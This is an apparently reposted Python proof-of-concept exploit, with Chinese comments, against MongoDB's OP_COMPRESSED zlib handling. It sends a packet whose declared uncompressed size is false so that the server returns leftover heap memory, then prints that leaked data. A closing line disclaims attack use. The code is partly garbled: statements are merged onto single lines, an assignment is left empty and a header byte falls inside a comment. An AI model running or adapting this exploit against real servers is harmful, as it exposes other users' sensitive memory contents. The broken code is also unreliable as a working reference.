import socket
import struct
import zlib
import sys

TARGET_IP = "127.0.0.1" 
TARGET_PORT = 27017 def build_malformed_packet():
    # 1. 准备一个合法的原始 Payload (通常是 isMaster 或 ping) # OP_QUERY: flags=0, collection="admin.$cmd", skip=0, limit=-1, query={"isMaster": 1} # 这里我们用最简单的 BSON 构造: {"isMaster": 1} # \x13\x00\x00\x00 (doc length) \x10 (int32 type) isMaster\x00 \x01\x00\x00\x00 (value 1) \x00 (term)
    bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00' # OP_QUERY 头部: flags(4) + coll_name(cstring) + skip(4) + limit(4) # admin.$cmd\x00
    op_query_header = struct.pack('<I', 0) + b'admin.$cmd\x00' + struct.pack('<II', 0, 0xFFFFFFFF)
    original_msg = op_query_header + bson_payload
    
    real_uncompressed_size = len(original_msg)
    
    # 2. 压缩 Payload (Zlib) # 我们只压缩那个合法的 op_query 部分
    compressed_body = zlib.compress(original_msg)
    
    # 3. 构造恶意的 OP_COMPRESSED 头部 (The Exploit) # Struct: # MsgHeader (16 bytes) # originalOpcode (4 bytes) = 2004 (OP_QUERY) # uncompressedSize (4 bytes) <--- 攻击点 # compressorId (1 byte) = 2 (Zlib) # --- 恶意逻辑 --- # 我们告诉服务器解压后有 10,000 字节,实际上解压出来只有几十字节。 # 服务器会分配 10,000 字节的堆,前几十字节被覆盖,剩下全是内存中的敏感残留数据。
    fake_uncompressed_size = 10000 # OP_COMPRESSED 数据部分
    op_compressed_data = (
        struct.pack('<I', 2004) +            # originalOpcode (OP_QUERY)
        struct.pack('<I', fake_uncompressed_size) + # MALICIOUS SIZE b'\x02' +                            # compressorId (Zlib)
        compressed_body                      # Actual compressed data
    )
    
    # 4. 计算并添加 MsgHeader # MsgHeader: messageLength, requestID, responseTo, opCode # opCode 2012 = OP_COMPRESSED
    total_len = 16 + len(op_compressed_data)
    request_id = 
    
    header = struct.pack('<iiii', total_len, request_id, 0, 2012)
    
    final_packet = header + op_compressed_data
    return final_packet, request_id

def exploit():
    print(f"[!] Connecting to {TARGET_IP}:{TARGET_PORT}...")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_IP, TARGET_PORT))
        
        print("[*] Connection established.")
        print("[*] Building malformed OP_COMPRESSED packet with Zlib length confusion...")
        
        packet, req_id = build_malformed_packet()
        
        print(f"[*] Sending {len(packet)} bytes...")
        sock.sendall(packet)
        
        print("[*] Waiting for server response (leaked memory)...")
        # 接收响应头部 (16 bytes)
        resp_header = sock.recv(16)
        if not resp_header:
            print("[-] Connection closed unexpectedly.")
            return

        resp_len, resp_id, resp_to, resp_opcode = struct.unpack('<iiii', resp_header)
        print(f"[+] Header received! Total Length: {resp_len}, OpCode: {resp_opcode}")
        
        # 接收剩余的数据 (Payload) # 这部分数据里包含了我们要的 Heap Memory Leak
        leaked_data = b''
        remaining = resp_len - 16 while remaining > 0:
            chunk = sock.recv(min(4096, remaining))
            if not chunk: break
            leaked_data += chunk
            remaining -= len(chunk)
            
        print(f"[+] Successfully captured {len(leaked_data)} bytes of data.")
        print("-" * 50)
        
        # 简单打印一部分可能泄露的字符串 (ASCII) # 注意:这里混杂着二进制和文本,可能是别的会话的残留
        printable = ''.join([chr(b) if 32 <= b <= 126 else '.' for b in leaked_data])
        print("Raw Memory Dump Preview (Last 500 bytes):")
        print(printable[-500:])
        print("-" * 50)
        
        sock.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

禁止用于攻击


📌 转载信息
原作者:
huanlin
转载时间:
2025/12/25 10:19:48